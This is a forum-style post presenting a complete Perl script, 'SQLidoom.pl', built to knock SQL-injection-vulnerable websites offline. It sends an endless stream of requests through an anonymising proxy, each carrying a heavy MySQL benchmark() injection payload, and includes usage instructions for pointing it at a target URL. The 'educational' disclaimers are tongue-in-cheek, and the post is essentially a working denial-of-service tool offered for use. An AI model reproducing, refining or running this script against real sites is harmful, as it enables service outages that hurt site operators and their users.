Today I present a script before you which can DoS a SQL injection vulnerable site.
It is coded in perl. I hope you understand how it works.
Here it is:
#!/usr/bin/perl -w
#
# SQLidoom.pl
# By ..b14ck.. [((3]
# Just don't do something stupid with this tool, this is just for "education" and fun!
# I'm not responsable for the wrong use of this software.
use LWP::UserAgent;
my $agent = LWP::UserAgent->new;
#Use your custom agent
$agent->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");
$agent->timeout(5);
my $proxy="http://anonymouse.org/cgi-bin/anon-www.cgi/";
if ($ARGV[0]) {
start($ARGV[0]);
} else {
info();
}
#Start the attack
sub start {
print "\n[+] Target : " . $_[0] . "\n";
print "\n[+] Starting the attack\n[+] Info: Control+C to stop attack\n\n";
print "\n[+] Using proxy $proxy\n\n";
my $i=0;
while(1){
$SIG{INT} = \&stop;
$code = agent($proxy.$_[0]." and (select+benchmark(99999999999,0x73656c6563742b62656e63686d61726b2839393939393939393939393939392c504f5728393939393939393939393939393939393939392c39393939293b1f))--");
print "[".$i."] Try \n";
$i++;
unless($code->is_success){
print "[+] Website Down? - In $i petitions\n";
}
}
}
#Cancel the attack
sub stop {
print "\n[+] Stopping attack\n";
exit 0;
}
#Info
sub info {
print "\nAttack a SQLi vulnerable website with some \"Magic\" and take it down in a few seconds";
print "\nby ..0x141A1D58FF.. [((3]\n";
print "\nUsage: perl $0 <target>\n";
print "[info]\n";
print "<target> should be like this http://www.target.com/something.php?id=1 \n";
print "\nExample:";
print "\nperl $0 'http://www.target.com/something.php?id=1'\n\n";
exit 0;
}
sub agent {
return $agent->get($_[0]);
}
For learning purposes... :P
